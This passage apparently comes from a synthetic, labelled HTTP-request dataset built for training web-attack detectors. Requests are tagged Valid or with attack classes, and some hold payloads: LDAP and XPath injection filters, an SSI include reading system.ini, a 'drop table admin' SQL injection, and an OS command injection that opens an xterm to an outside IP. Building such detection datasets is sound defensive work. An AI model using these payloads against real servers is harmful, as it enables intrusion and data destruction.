isbDhb6dsm=75597&rbrapzsy9n82aTe=di&Irbn7rrmdfid=cieMn&fdedfnaa=rhqGI&aktlbpm7a=126248676&uenrrr=asz4tsastdin6Np&zee=isaittttrtuj&istctTbozctap=701091&5tjyih=9625&osItiap=79329&liouHtrdMr=9&GQJvt=97&em3GegpNlAmmTdt=oBUj&texecCPwm=e&98wof=102

End - Id: 37280
Start - Id: 21578
class: Valid
GET /uileneseensevoeo/sdu5blxaml/tyeapetpnbiR/m4j/edieeqePsa8t6/wNs/oZax1GYZ610Nf/hsq6oa9heeolA1awog/77n6aitsg4otqd.aspx?ncaIaonlhssn=69320869&etEafgte=3722&vtonsl=17574565&omx7PW4=%3Cfselectn%5C&df4t92yHeeo=gteut-2d-eobb&eoen=21053385&tjmomzslct=07YZvhpeZ&odddozteea=Estso&aydcchRner=976530&i2antwtiutco=ivdz&kiframesKbO26OOnT=ri&fIrcpYODwp-Vnetcathaving=wy&li1ssnHcafsizt=ro&QOROJ1qUocMb=3409&enomIjd9trdg=rC%3Fmnoy HTTP/1.1
Host: www.ctume5me.fr
Connection: keep-alive
Accept: video/mpeg, text/*, image/png
Accept-Charset: *
Accept-Encoding: deflate;q=0.8, deflate;q=0.7, compress, deflate;q=0.9, compress
Accept-Language: u-Kes8
Cache-Control: no-transform
Client-ip: 63.30.21.166
Cookie: gaGede=rQoGgqX;nrretiG2i=sQduA;3e2e5=onuluo;ie=hoewuIsyolem0e
Cookie2: $Version="58"
Date: Sun, 30 Dec 07 12:48:33 UTC
ETag: W/"DhKnl6k1X54a0HDS96hg"
Expect: 100-continue
From: t1Gpd0t@aonx3yb.biz
If-Modified-Since: Thu, 21 Dec 06 14:47:27 GMT
If-Unmodified-Since: Wed, 31 Aug 05 01:01:57 CET
If-Match: *
If-None-Match: "g.g@@54zM63eWlvddEAg"
If-Range: Tue, 21 Mar 06 04:51:11 CET
Max-Forwards: 85
MIME-Version: 7.7
Pragma: l='saiO'
Proxy-Authorization: Digest nc=69Fc9563
Authorization: enmtry E8bhnt=3eeihtz
Range: -2,-697987
Referer: /eMucnoe/brn2/T4sy2isl/sradut.pdf
TE: deflate
Trailer: If-Range
User-Agent: iahesoeaLn (szC2lgz; aEE6ew2FQf; xr74P.r; a@Vf32i; rui9.4fZ)
UA-CPU: x86
UA-Disp: 878,5357,32
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 0542x2765
Via: HTTP/8.7 183.18.136.216:1964, HTTP/4.4 9.202.252.195, trhie/0.5 112.159.205.214
Transfer-Encoding: compress
Upgrade: rle/0.9, 32noar/1.9, terase/3.6, lop/4.7, lgd/8.7
Warning: 906 www.0bBaahO.html "iyyOei" "Thu, 02 Feb 06 10:40:07 UTC"
X-Forwarded-For: 125.112.206.65
X-Serial-Number: 42015
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21578
Start - Id: 32253
class: Valid
GET /srIqog.ng2@p/sNHzufeOLntU/ronieEsrtntoet/j1.htm?1inrHe3ap=%5C%40ohXudoi7i%2Fo&slpsrThirmk=otsn%3Aof+pdt&itr=186474029&eaallus2aEbs=Vvi&38UbWoY=%3Dedsei%26yvaruM&sThtldhEonibtz1=pjofcwdi&uaTaatipn=t HTTP/1.0
Host: 206.160.63.107
Connection: close
Accept: application/*;q=0.4
Accept-Charset: *;q=0.4
Accept-Encoding: deflate;q=0.6, identity;q=0.2, gzip;q=0.6, identity;q=0.7, identity;q=0.4
Accept-Language: *
Cache-Control: no-transform
Client-ip: 69.7.19.37
Cookie: iyed2t=b-Y
Cookie2: $Version="518"
Date: Mon, 24 Mar 08 03:03:46 GMT
ETag: "7TxxON3@qF_7MM7tg2F"
Expect: dEvf=ealzsyq
From: ajtRne@yawe.com
If-Modified-Since: Thu, 02 Sep 04 02:05:28 CET
If-Unmodified-Since: Wed, 05 Nov 08 02:37:24 UTC
If-Match: "MxH3it@XABNCcpr"
If-None-Match: *
If-Range: "PD7A.oqGzwFFu8mgZwO"
Max-Forwards: 14
MIME-Version: 7.8
Pragma: Bhs=Mm
Proxy-Authorization: Basic dG8xbnJJbDprdHJo
Authorization: Digest opaque="orefl"
Range: -1,-97620,-0636
Referer: /esqly.asmx
TE: trailers,trailers,trailers
Trailer: Warning
User-Agent: 71bwWWOt3G http://www.eraevy.uk
UA-CPU: StrongARM
UA-Disp: 8350,6514,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 2503x5889
Via: 2.0 101.194.173.200
Transfer-Encoding: identity
Upgrade: skeho/2.7
Warning: 330 www.en4chatr.gif "gimro07nicd5tc7s" 
X-Forwarded-For: 145.88.219.204
X-Serial-Number: 76488
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 32253
Start - Id: 37042
class: LdapInjection
GET /hCOQuubTKbq/AfFV5_X_kIWAetcKx/jZ4lordk9WI/oYy/CeCIWSm.cfm?wetneorhsvtm=281661829&-Ndiv_sock_streamJCW6j_=uCwCsY&rO8GWaje=88%29%28%26%28objectClass%3Dptl%29%28%7C%28sn++++%3D++++1fo%29%28cn%3De5+++++J*%29%29&ek=nk33satwfdr5o&ys3=y+OtmpeupObefe&aeheidiiosHu7d3=ik6ap-L&G33orbS3rAeehmw=rhhsnte&Yctea5uwh=aegHu&edstrftyntbi=rsock_streamt&csLweexeT7s=4&nmsm=l99an&d@-GGconnect.vj=t8mhAysluspttqr+x HTTP/1.0
Host: www.ietbeeli7c.org:80
Connection: close
Accept: video/mpeg;q=0.6
Accept-Charset: x-mac-ce;q=0.7, big5;q=0.9, koi8-r;q=0.8
Accept-Encoding: compress;q=0.3, gzip, gzip, gzip;q=0.4, gzip;q=0.9
Accept-Language: *;q=0.3
Cache-Control: min-fresh=7343
Client-ip: 188.212.178.172
Cookie: 6roossd=52482
Cookie2: $Version="6"
Date: Fri, 07 Apr 06 02:35:58 CET
ETag: "Nwi0NjG_4ak-fCi9N.eQ"
Expect: kodtt
From: tJpe@htd4aess.biz
If-Modified-Since: Fri, 17 Mar 06 03:30:45 CET
If-Unmodified-Since: Mon, 05 Sep 05 10:55:01 CET
If-Match: *
If-None-Match: *
If-Range: "nFLIjUeH7XGYUQ1pvTi"
Max-Forwards: 319
MIME-Version: 3.6
Pragma: ac='szbrArde'
Proxy-Authorization: Digest opaque="isetlaxp"
Authorization: Digest cnonce="REnaYh"
Range: -742236,5-8909,-634
Referer: http://twya0r.biz/onuea/7gl0oui.css
TE: chunked,deflate
Trailer: Date
User-Agent: Mozilla/6.9 (Windows; U; WinNT 7.3; nt-ua; rv:0.6.8) Gecko/86403769
UA-CPU: StrongARM
UA-Disp: 370,042,32
UA-OS: Win98
UA-Color: color16
UA-Pixels: 9902x0663
Via: 2.1 201.140.223.201:942
Transfer-Encoding: h4e2Oh; zotoikeu=rAgrxl
Upgrade: nopuat/4.5
Warning: 659 www.4uoi.png "b04aynrye3u6tsecce" "Thu, 21 Jul 05 09:43:39 GMT"
X-Forwarded-For: 164.143.217.25
X-Serial-Number: 4092233930
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37042
Start - Id: 20830
class: Valid
GET /tHQ8aboot.iniPHservices/ozpyqfZNSp4McAnS/L0t7rn/ugmaT3.bin? HTTP/1.0
Host: 199.197.33.207
Connection: close
Accept: */*;q=0.8
Accept-Charset: *;q=0.5
Accept-Encoding: *;q=0.2
Accept-Language: *
Cache-Control: min-fresh=4
Client-ip: 52.205.170.131
Cookie: p2sonm089sniyo=epeFP
Cookie2: $Version="678"
Date: Fri, 07 Dec 07 02:04:06 CET
ETag: W/"5eYRdFZh_d3T0SHes67"
Expect: 637Ml
From: itbAy3@24cao.it
If-Modified-Since: Fri, 05 Jan 07 19:52:23 GMT
If-Unmodified-Since: Mon, 03 Aug 09 13:57:34 CET
If-Match: "WM-ghVO06ttY_IJij3h"
If-None-Match: "ldd-uBm8xM_-Mseahrpr"
If-Range: Sun, 13 May 07 16:07:52 GMT
Max-Forwards: 90
MIME-Version: 3.8
Pragma: no-cache
Proxy-Authorization: oCeaVw h5ecsw=ezyieu
Authorization: Digest qop=auth-int
Range: 72115-,9-3120,919774-69202
Referer: /2nwtUtza/bzrSaw/a9oug/nLtr1e.avi
TE: gzip;q=0.9,deflate
Trailer: TE
User-Agent: Mozilla/0.4 (Machintosh; U; PPC 1.3; 0w-mr; rv:5.8.2) Gecko/41677875
UA-CPU: 68000
UA-Disp: 7276,7233,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 0029x450
Via: 5.2 254.190.34.145, 8.1 247.170.140.214
Transfer-Encoding: deflate
Upgrade: nfoEet/4.4, cNiaOe/9.4
Warning: 765 186.65.136.9 "kes3cga1t4maesoo" "Mon, 23 Nov 09 01:50:54 CET"
X-Forwarded-For: 196.176.140.95
X-Serial-Number: 390733
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 20830
Start - Id: 43060
class: OsCommanding
PUT /xgNvre791dotehiycoto/w1ira/n3NhSEXyY/oX.ZurmuTx-rn2/T19TYbO_.htm? HTTP/1.0
Content-Length: 240
Content-Language: de6uc
Content-Encoding: deflate
Content-Location: /ergms/ldEt/blEt.nsf
Content-MD5: aTRvV3Ryb25jdG5nNWVzbg==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 02 Feb 07 12:20:49 UTC
Last-Modified: Sat, 08 Jul 06 24:33:46 GMT
Host: www.soneent.ch:4
Connection: keep-alive
Accept: */*;q=0.0
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=44356
Client-ip: 106.223.101.99
Cookie: e6oyoKAnw2c=it5nshutdown=oM;qiLTyKfNaZkI=420907
Cookie2: $Version="6"
Date: Mon, 12 Jan 09 20:58:20 CET
ETag: W/"mGNh-de-uS1REb0"
Expect: 100-continue
From: sTleEdu@dtAttFd.de
If-Modified-Since: Wed, 02 Nov 05 16:43:46 CET
If-Unmodified-Since: Sun, 28 Jun 09 02:18:18 UTC
If-Match: "QL1Ivc@iqjP4N6rHlA8"
If-None-Match: "_eNPjrb3jxnMW0ToH"
If-Range: Thu, 18 Sep 08 08:59:25 CET
Max-Forwards: 9
MIME-Version: 1.8
Pragma: i0nedc5='eiy'
Proxy-Authorization: zaetf rssn=ghd0r
Authorization: Basic cGFrZVNsTzpvZWZ0MzR3aQ==
Range: -324,1-544,8-732
Referer: /yo7se/1idioyu/NaTlsan.htm
TE: deflate
Trailer: Accept
User-Agent: Mozilla/2.9 (X11; U; Linux i586 2.6; st-d3; rv:5.7.8) Gecko/22241090
UA-CPU: Sparc
UA-Disp: 575,612,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 2695x320
Via: oeni/1.6 69.127.27.89:082
Transfer-Encoding: identity
Upgrade: tun3o/7.3, omna/4.0
Warning: 511 www.SwtUak.png "nrU8ee" "Tue, 13 Jan 09 06:56:32 GMT"
X-Forwarded-For: 214.245.16.235
X-Serial-Number: 13504238814
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

tS=se1ft0o&scc4tyidsl0rseE=boot.ini4sh5x0tnr&kslt8=|/usr/openwin/bin/xterm+-display+18.251.160.96:0%00&tsai=71484210&tsoasioCi=8749&2Osuvontetietl=8510194592&ar8ru6pw2wrIsb=auQRvyp&enh=475272&H87d@_8=554753&R32N1pkX7Ior9=e

End - Id: 43060
Start - Id: 29239
class: Valid
GET /c-RfnnBoSWCmlj16x/pbD3TdFh/H1nd0Wa/qSyFK9ffz/swindow.opennDZ/ltrsditiwpses.asmx?Eh=esnsreys4rn&liEow=+Wdivhtwp-o&roeherc3tlan=s6q2eea5a&sotdNbol=%5Dt&ddcrtAemYtwHe=swhao&8rwerutosmedeo=6&h2og9acdelht=21&8g3eoltbpM6i=340329&ahsams1nfi=ofechoEnus+remg HTTP/1.1
Host: 6.140.219.195
Connection: close
Accept: audio/*;q=0.4, text/plain;q=0.8
Accept-Charset: *
Accept-Encoding: 
Accept-Language: cdr-szORuaT;q=0.8, qean2-oaoao;q=0.3, n8Tstc-nhOojey, Rseob-l, f-rM
Cache-Control: min-fresh=602
Client-ip: 218.202.244.174
Cookie: mp=nIz;g2aacrvm5=getrA(na
Cookie2: $Version="83"
Date: Tue, 20 Jan 04 18:08:55 GMT
ETag: "kCKqMcJcjPcEub@a"
Expect: hicm3Arn=nr4l
From: hmiek@luts.de
If-Modified-Since: Tue, 27 Dec 05 18:22:12 UTC
If-Unmodified-Since: Sun, 28 Oct 07 15:57:13 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 5584
MIME-Version: 3.8
Pragma: no-cache
Proxy-Authorization: Digest qop=deeie
Authorization: NTLM aExpcmlkaTZhcnN3YUVmZWFxYWhiYmlhdUpuaDNDcEdjZG92dXI=
Range: -841070,9-15786,195422-
Referer: http://9Yn2yahs.de/tlnhsbC/atqat4.aspx
TE: deflate,chunked
Trailer: If-Match
User-Agent: Mozilla/6.3 (X11; U; Unix 1.8; ar-hs; rv:0.2.5) Gecko/24486234
UA-CPU: PowerPC
UA-Disp: 323,9503,16
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 1569x604
Via: ennza/3.2 16.238.0.112
Transfer-Encoding: gzip
Upgrade: Rta/1.2, s2leo/1.5, aoHgMs/5.9, unylHr/1.1
Warning: 244 228.151.58.169 "ss5raaoeor" 
X-Forwarded-For: 232.31.166.192
X-Serial-Number: 4249614312362158832
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 29239
Start - Id: 40485
class: SSI
GET /s1-ppll/F1UCQopxMTtwp-t/oaajvrrakxoon/9kCo/leaetasauedthfEaih/sx/eJ0ppPtl8yplPw/tnhvdttesf9unrhfetxe/s-xvVWA4FBI3inkNYW/oeMaabsrn/c7JZEJ1PdzmSgtgsX/1ontthgefmmct3.mspx?TAFS1NmBOvbscriptnull=stylenh&tnaumctAHZae=332181&wpoAanNenlcwncm=9595285&G4ih=%3C%21--+%23include++++virtual%3D%22c%3A%5Cwinnt%5Csystem.ini%22--%3E&surhRneuaunpl0x=ipeo&iidoa3Oaddnd=sN.EhnFFN9HN&urH=zI5s%26%3Fai%24t%3Ctoa2yijr&wgetqDI7=1365351&8idw=a%26lsi&et7ehWeA6ufr=owAy2s&scriptWuzIPO=1009&dtfasnhie=iyobioE&0nzBAbNO0pM=874919381 HTTP/1.1
Host: 150.45.169.103
Connection: close
Accept: application/*;q=0.8, video/*
Accept-Charset: euc-kr;q=0.5, macintosh, x-mac-japanese, euc-jp, euc-cn
Accept-Encoding: *;q=0.5
Accept-Language: ibnszo-aocBtef4;q=0.2, ne-st8aa;q=0.6
Cache-Control: min-fresh=887
Client-ip: 178.48.213.72
Cookie: g1153G=mnodexp_ar;tvcnesnatOtske=]oss
Cookie2: $Version="027"
Date: Tue, 01 Mar 05 22:11:49 UTC
ETag: "a.QN3Ry4VSFG10B9J-h"
Expect: 100-continue
From: Meara5ka@omiicnkiy.st
If-Modified-Since: Wed, 23 Sep 09 23:56:41 GMT
If-Unmodified-Since: Thu, 06 Jul 06 22:10:49 CET
If-Match: "nEuMiCLc82-QfWlr7X"
If-None-Match: *
If-Range: "OGpbVXswnPOwa-k"
Max-Forwards: 407
MIME-Version: 2.7
Pragma: no-cache
Proxy-Authorization: Gdzho e8cm6Rl=tdiaor
Authorization: NTLM aVRzd25zd3lpM0VhYUF1eXFlanp6bDNlZXBpNVpkcnpuaWJUZmE=
Range: 4-27
Referer: http://www.btdLv2jT.de/7capTvi/tfrNhl/twa9on.asmx
TE: chunked,gzip
Trailer: Warning
User-Agent: Mozilla/0.4 (compatible; Konqueror/4.6; Windows NT; rshebrhi; 0sOw5A)
UA-CPU: Sparc
UA-Disp: 609,4490,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 0287x026
Via: HTTP/9.4 www.fsdnni.html:76, isne/4.3 11.67.192.91
Transfer-Encoding: identity
Upgrade: ts54/2.4, d9bEte/1.6, rdsh/2.9
Warning: 801 69.96.230.25 "gie9i8edctt4ENs" "Tue, 27 Jan 04 19:25:43 UTC"
X-Forwarded-For: 50.57.73.228
X-Serial-Number: 55598980904343059452
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40485
Start - Id: 42680
class: SqlInjection
GET /t4bedslrnuep/5WOdidPncodM7hp/qtiU-r6/ciu/oh-pSYiahN3Cdo8IqmRc/hwnPSltn2/opt6bTOSGP5MvDM/oycod/LplgnmtsnteptTimns/uW6C/24uK6.tiff?vqothe=185&Mz81Xdqw0=n%28hawaIn%29jchildod&neaiRcahI=mea&Tportmitew=2336139&0re16beFa8o4ee=+n&disutseimaIstne=not+-D9&ssd=%27%3B+drop+++table+admin&hqiDrlotuIiblny=o+cat%40formtwinnt0cincludei+o&lX=lcaafn&uRlAa8=r&Eaxehcasmdheudk=htexgcoe&ubtshipn=nEJt&teuagRo4u0vgdt=thvuescaamlasu4j&6oyi=eimr5 HTTP/1.1
Host: www.ihsp0to7.be
Connection: ith8oN
Accept: video/*;q=0.6
Accept-Charset: cp-950, x-mac-turkish
Accept-Encoding: *
Accept-Language: seprngop-dl2j9xtj;q=0.6
Cache-Control: max-stale=6
Client-ip: 219.244.18.221
Cookie: ul7nt6oshgnoo=ax5wolt9stfsfeessS;7nausEldontoitw=enimeisumc7k1;tdsy2Qob0=936
Date: Fri, 05 Mar 10 23:07:33 UTC
ETag: "xm_kl@DG33VU5oJ"
Expect: 100-continue
From: keNoy@ouhsnitwek.de
If-Modified-Since: Sun, 18 Apr 10 09:38:13 UTC
If-Unmodified-Since: Sun, 17 Apr 05 03:23:00 GMT
If-Match: "Cgq-mthr4eBGYlXwdr"
If-None-Match: *
If-Range: Thu, 28 Apr 05 16:31:57 GMT
Max-Forwards: 758
Pragma: ehmat='oRsiezO'
Proxy-Authorization: lmeoss zqgl=nnriemfz
Authorization: Basic MkFnY3Jpb3M6cjlzcmE=
Range: 498-
Referer: http://nrnc.de/s4Rd0rmu/I7eglo9o/Oacry4t.fgf
TE: chunked;q=0.2
User-Agent: Mozilla/6.0 (Windows; U; WinNT 7.8; wf-br; rv:9.6.8) Gecko/63242568
UA-CPU: MIPS
UA-OS: WinNT
Transfer-Encoding: identity
Upgrade: imz/3.7, oos/0.1
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42680
Start - Id: 22930
class: Valid
GET /cnMn@R2A-5vJw4Zt/aLEtN78ol8DYxsr1/tH/zemdynce/oFn9hsoaeptnaa/hf.yc9iM9kVN/lUjtuwbTN_u6iH-2/mgueargsnntmE/loBDK/H1El5eototae/rPEDw.png?locationiDorpasswd=ph%28dK9aerb3%7Cb&ex=xp_dioya0Eau&obse=29&yaoas=qbamgi%5Ce2O+jlaeu HTTP/1.1
Host: 248.255.21.38:8671
Connection: close
Accept: text/html, audio/*;q=0.7, image/jpeg
Accept-Charset: *;q=0.1
Accept-Encoding: deflate, gzip;q=0.4, compress
Accept-Language: l56Rl-ia, 5uovie-esh;q=0.7, Hlnudw-22iu;q=0.9, pD-ys
Cache-Control: no-cache
Client-ip: 244.144.0.42
Cookie: eftu=130544005;lwru=54;tEelwi=l@gDG3IM;gct=9632;sinput7htpassdp=)lh;sAmoraot8yrt=535077
Cookie2: $Version="24"
Date: Thu, 19 Nov 09 05:35:56 GMT
ETag: W/"7wTF12Qg9gzKIlgkm9"
Expect: 100-continue
From: sheeev0h@4urQEniSH.be
If-Modified-Since: Tue, 24 Mar 09 08:16:09 GMT
If-Unmodified-Since: Sat, 01 Dec 07 06:22:31 CET
If-Match: "fYV@Js933u9Ccdn6dMFV"
If-None-Match: *
If-Range: Sun, 06 Jan 08 10:17:46 UTC
Max-Forwards: 811
MIME-Version: 5.4
Pragma: no-cache
Proxy-Authorization: ieSnx2 uercttms=caa5oarX
Authorization: NTLM a29vZ3MxaGVhaXNva01lb2k0b2hhb3Rkb21OZXRpaHI=
Range: 9849-,026-7220,-544798
Referer: http://www.I4ssi.com/tntat0/2Tnix.doc
TE: trailers,deflate;q=0.4
Trailer: Transfer-Encoding
User-Agent: Mozilla/0.4 (Machintosh; U; Mac OS X 4.3; na-xc; rv:0.6.8) Gecko/61182123
UA-CPU: MIPS
UA-Disp: 3881,209,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 159x1338
Via: 5.5 251.4.33.58
Transfer-Encoding: identity
Upgrade: aHpmg/5.8, 48c/5.3
Warning: 116 www.qob7.png "kgn8bPjeeFe" 
X-Forwarded-For: 18.154.169.169
X-Serial-Number: 08954851223
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 22930
Start - Id: 33586
class: Valid
POST /e7lar/Ica0bpdhhainmXrlT/tB-ARxtLf/ueL8ftRorr3a9n/o_s4FA9HNku8F2P1NE/ps0meiwt/e9ca/@cJC3ug/LatoEmngernratEi4lo/adFmoHmFQM6ZIHdLIG/entenfEcaqe.tiff? HTTP/1.1
Content-Length: 291
Content-Language: ec
Content-Encoding: deflate
Content-Location: /dmtmSje/5talai/soluS0c/rasdhhiv/eveard.swf
Content-MD5: ZHRwYUloMnJpdWxlcXJIcw==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 21 Nov 06 01:21:02 GMT
Last-Modified: Mon, 21 Apr 08 18:55:00 CET
Host: www.8vpebenmye.fr:80
Connection: close
Accept: audio/x-wav, image/jpeg;q=0.3, video/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: ol-nurllrT
Cache-Control: max-stale=906
Client-ip: 46.86.121.189
Cookie: tRhQw=evmOM.yYCtN;json9s=74803;rhavinghttpo=411;access_logP.1R.SP=sda5 l?nl0dpwhp[aR;y3wwevyrhersems=nx@Y_bB;9ivtO65=aJ4fopHtXzf
Cookie2: $Version="998"
Date: Mon, 30 Jul 07 01:52:16 UTC
ETag: W/"QI_U8iQ-IBKYytc1"
Expect: 100-continue
From: HEilye@Ehze.com
If-Modified-Since: Mon, 28 Jun 04 13:05:19 CET
If-Unmodified-Since: Fri, 15 Apr 05 13:40:09 UTC
If-Match: "bQyW1Bazb5xt8Ikn"
If-None-Match: "aeMy6mbTTvl37aDw"
If-Range: *
Max-Forwards: 45
MIME-Version: 7.8
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: NTLM eHM2c3V5RXVTb29yZG9pZHVkb21lZmFoZXNsYTJhc3J6bg==
Range: -46551,-703321,6844-
Referer: http://shvwf.st/tJToniNn.php
TE: trailers,trailers
Trailer: Via
User-Agent: Mozilla/8.9 (Windows; U; Win 9x 4.5; FE-he; rv:0.7.8) Gecko/70196330
UA-CPU: x86
UA-Disp: 4987,665,32
UA-OS: Win98
UA-Color: color16
UA-Pixels: 578x0874
Via: rtfAn/9.2 www.aSaeugrg.gif
Transfer-Encoding: deflate
Upgrade: ire/8.1, eahte/4.5, eos/9.6, rle/1.8
Warning: 661 www.ngtao.tiff "ezebae8kput" 
X-Forwarded-For: 156.122.130.190
X-Serial-Number: 410317302
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

edd8nsOen=emi&0toe27CqeSht=il3abzaoue2u&buR7a=46344&8mttFeOuo=bsservices&sana=ofc&trw7flihriOoa=mgieh1o8oauatma8&xeuntehihnuoaz=s9yk5@KlIcWX&shyAdr0dfnta=ydocument0e&eieCromaoeobbE=67646&baa6pMi6bH=it4omheoledTwaTmem&yihrtcmnl=raists oicZrTh&ahatswdohibc=dtdtnCW&ts=aayt&frtend12nns32=achi

End - Id: 33586
Start - Id: 49397
class: XPathInjection
GET /pPOv8f4wvPX-kRH/admin1/tFtur9V9P/15A/snt1tgxtolntu.dll?Kpassthru5Mp=nph-lgroup+byi4mrcid%27tpst&aligemho=euz&nRgieoim=+eA7e9%5Bizm%5DWn&pjtjnmsfp3LmTtr=iZA%40qC&n7Mas4c=el%7Ceedsw+&v8ee7a=%28i++%3C+++++count%28rsn4d%2Fchild%3A%3Atext%28%29%29+++and++++j++++%3C++++count%28ehcf%2Fchild%3A%3Acomment%28%29%29+++and+++k++%3C+++count%28ag9oab%2Fchild%3A%3A*%29++++%29&teiAon=%3Dlo%29emsnscripte%5D&Tf-nATx=phpkSsn%5Cc5w6i%5Cc+0&fatnaedd5P=umur1eM&uIaoec=documentPferj%24n6eoKoe HTTP/1.1
Host: www.hibii.com
Connection: odhm
Accept: */*
Accept-Charset: euc-cn;q=0.8
Accept-Encoding: *;q=0.0
Accept-Language: e-b5
Cache-Control: min-fresh=5
Client-ip: 231.167.72.214
Cookie: ge=zL6CzNoxflNL;oitiboajpe8Ttin=06o;mZR1QVq=Wos;praetwnlgekv=dpaccept
Cookie2: $Version="461"
Date: Wed, 14 Jun 06 05:48:02 GMT
ETag: "pzzWYLc9y.a5zyTx8D"
Expect: egng4=ictu
From: otnE6rt@cbsnLanere.cz
If-Modified-Since: Sun, 08 Jul 07 22:24:35 GMT
If-Unmodified-Since: Fri, 26 Feb 10 03:23:02 GMT
If-Match: *
If-None-Match: *
If-Range: Wed, 14 Jul 04 20:23:54 CET
Max-Forwards: 06
MIME-Version: 1.5
Pragma: nkrreZi='ons'
Proxy-Authorization: NTLM OXV0b2Zqb3NpZXN6ZmkwaUJ0dHVpc25jZG9hb3NmcHQ4dHJybnJzM05wMg==
Authorization: Basic c2RndGVvMm86ZXJObWg=
Range: 67912-847396,-254666,29-
Referer: /oOetmh/tMyaa/GrmN/hseqtou/pe59.asmx
TE: trailers,deflate;q=0.9,deflate;q=0.9
Trailer: If-Range
User-Agent: pMsF4Ww http://www.bee6Em.fr
UA-CPU: StrongARM
UA-Disp: 129,1543,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 6489x8625
Via: HTTP/8.1 www.oEvontr.gif
Transfer-Encoding: thpat; fahT=D2hhew
Upgrade: goiteB/8.3
Warning: 260 86.25.83.250:0820 "hreojjeu" 
X-Forwarded-For: 71.48.20.140
X-Serial-Number: 37054990
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49397
Start - Id: 37755
class: LdapInjection
GET /h5dHBKhZKWYw9fqdx_/k.OxUMst./Tnc0mam8/admin5MRuRuo8Wmkpq/dMNFdQw_7/If2mPmsoe9C/yyuebgeb30eosetf/uh/cn3motyu8eMLCZBuTeO7.mspx?m3leoumirihiiI=%29%28+++%7C+%28+cn%3D*o++++%27brien*+%29%28mail+%3D*o++%27brien*+++%29+++&eO=90&UAobjectrmpmnjmnid=+osmhd1ihomedf%3Fen&hintlp=havingeuosnscript+yh+e&h3eistifnt=twFTf2g&HwIArpo0S=attia%7ErxmishomeF7div%3Asy+ HTTP/1.1
Host: 125.254.179.79
Connection: keep-alive
Accept: */*
Accept-Charset: koi8;q=0.5, x-mac-japanese;q=0.5, cp-932, x-mac-hebrew, x-mac-chinesetrad
Accept-Encoding: *;q=0.3
Accept-Language: *;q=0.9
Cache-Control: no-transform
Client-ip: 18.137.252.198
Cookie: nn2elo==dcsc;ilbtol=it;isnzx=<7&T%pelogtaLyryreplacea;ottn=chuagwideozaaidn
Cookie2: $Version="98"
Date: Thu, 03 May 07 16:18:06 UTC
ETag: W/"ud0ipGZ2us1mYZDzhVQc"
Expect: atsAq
From: Tnocerr@fsdzTjcit.de
If-Modified-Since: Tue, 12 Sep 06 04:22:45 CET
If-Unmodified-Since: Wed, 27 Apr 05 11:55:22 GMT
If-Match: *
If-None-Match: "yO9pLljBBdCVoyVhTR8o"
If-Range: *
Max-Forwards: 63
MIME-Version: 0.5
Pragma: l0=rde
Authorization: Digest realm
Range: 6-
Referer: http://3R2ane.cz/qifa.shtml
TE: chunked
Trailer: Proxy-Authorization
User-Agent: 9FS@j6W http://www.spajiTu.be
UA-CPU: MIPS
UA-Disp: 3833,663,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 644x6409
Via: FTP/6.0 www.irtA4.js
Transfer-Encoding: deflate
Upgrade: esS/4.5, qssn/5.3, wig/2.0
Warning: 397 www.estmthgu.jpeg "iqcdxmusey4i3" 
X-Forwarded-For: 49.81.169.152
X-Serial-Number: 4395839
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37755
Start - Id: 7811
class: Valid
PUT /pe0idoOtTi4jthk/oh9oEovIy/uweHT/insertlyxhttp5-GautoexecJWQ/0u.Ysr/aY/2pdgmaoarWiema5y/optDpZzhttpsy2/s0m@3/Kue.7/aY7B.dll? HTTP/1.0
Content-Length: 279
Content-Language: deh0i,qait
Content-Encoding: deflate
Content-Location: /nnwa/snee/TANnX.txt
Content-MD5: OWJuNW5sY2ZhRWhhZGNyZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 01 Mar 04 06:10:33 CET
Last-Modified: Thu, 18 Jun 09 18:44:42 UTC
Host: 167.247.166.116
Connection: close
Accept: */*;q=0.5
Accept-Charset: *
Accept-Encoding: *
Accept-Language: T-aai2SI;q=0.7, ikNpst-m
Cache-Control: no-cache
Client-ip: 167.26.49.158
Cookie: 4stitvrthre=lfiRy9nwieX
Cookie2: $Version="483"
Date: Thu, 10 Feb 05 03:29:44 CET
ETag: "ugBd2l0lTKnjtVWuG@"
Expect: Ijmoj7=poiim;ngs20lt=uyeqK
From: msDNtTe@mtt5jy.de
